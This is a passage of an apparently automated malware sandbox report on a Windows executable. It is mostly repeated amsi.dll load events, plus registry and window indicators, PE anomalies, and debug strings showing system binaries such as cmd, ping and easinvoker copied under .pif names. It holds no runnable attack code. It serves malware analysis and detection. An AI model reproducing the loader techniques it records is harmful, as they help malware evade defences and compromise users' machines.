                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
                  Source: 1m181Ru74o.exeStatic file information: File size 1566208 > 1048576
                  Source: 1m181Ru74o.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x10b200
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: 1m181Ru74o.exe, 1m181Ru74o.exe, 00000000.00000002.1425448990.0000000002276000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1296625632.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D07000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1297153626.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D37000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1396974122.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.5.dr
                  Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1402280809.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.6.dr
                  Source: Binary string: easinvoker.pdbH source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: 1m181Ru74o.exe, 00000000.00000002.1425448990.0000000002276000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1399478941.0000000015AEF000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1425970905.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1399478941.0000000015B1E000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1296625632.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D07000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1297153626.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D37000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1296854371.00000000028E4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: esentutl.exe, 00000005.00000003.1396974122.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.5.dr
                  Source: Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1402280809.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.6.dr

                  Data Obfuscation

                  barindex
                  Source: Yara matchFile source: 0.2.1m181Ru74o.exe.2eb0000.2.unpack, type: UNPACKEDPE
                  Source: alpha.pif.5.drStatic PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC895C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02EC895C
                  Source: alpha.pif.5.drStatic PE information: section name: .didat
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EDD2FC push 02EDD367h; ret 0_2_02EDD35F
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EB63AE push 02EB640Bh; ret 0_2_02EB6403
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EB63B0 push 02EB640Bh; ret 0_2_02EB6403
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EDC37C push 02EDC572h; ret 0_2_02EDC56A
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EB332C push eax; ret 0_2_02EB3368
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EDD0AC push 02EDD125h; ret 0_2_02EDD11D
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC307C push 02EC30C9h; ret 0_2_02EC30C1
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC307B push 02EC30C9h; ret 0_2_02EC30C1
